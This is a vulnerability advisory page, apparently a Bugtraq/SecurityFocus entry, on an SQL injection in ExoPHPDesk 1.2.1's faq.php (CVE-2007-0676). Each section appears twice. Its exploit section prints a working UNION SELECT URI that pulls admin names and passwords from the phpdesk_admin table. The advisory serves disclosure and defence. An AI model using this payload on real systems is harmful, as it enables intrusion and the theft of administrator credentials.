ExoPHPDesk FAQ.PHP SQL Injection Vulnerability
BID:22338
Info
ExoPHPDesk FAQ.PHP SQL Injection Vulnerability
| Bugtraq ID: | 22338 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-0676 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 31 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | ajann is credited with the discovery of this vulnerability. |
| Vulnerable: |
EXO ExoPHPDesk 1.2.1 EXO ExoPHPDesk 1.2 |
| Not Vulnerable: | |
Discussion
ExoPHPDesk FAQ.PHP SQL Injection Vulnerability
ExoPHPDesk is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
ExoPHPDesk 1.2.1 and prior versions are vulnerable.
ExoPHPDesk is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
ExoPHPDesk 1.2.1 and prior versions are vulnerable.
Exploit / POC
ExoPHPDesk FAQ.PHP SQL Injection Vulnerability
An attacker can exploit this issue via a web client.
The following exploit URI is available:
http://www.example.com/faq.php?action=&type=view&s=&id=-1'%20union%20select%200,concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109),char(101),char(58),name,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),pass),0,0,0,0,0%20from%20phpdesk_admin/*
An attacker can exploit this issue via a web client.
The following exploit URI is available:
http://www.example.com/faq.php?action=&type=view&s=&id=-1'%20union%20select%200,concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109),char(101),char(58),name,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),pass),0,0,0,0,0%20from%20phpdesk_admin/*
Solution / Fix
ExoPHPDesk FAQ.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].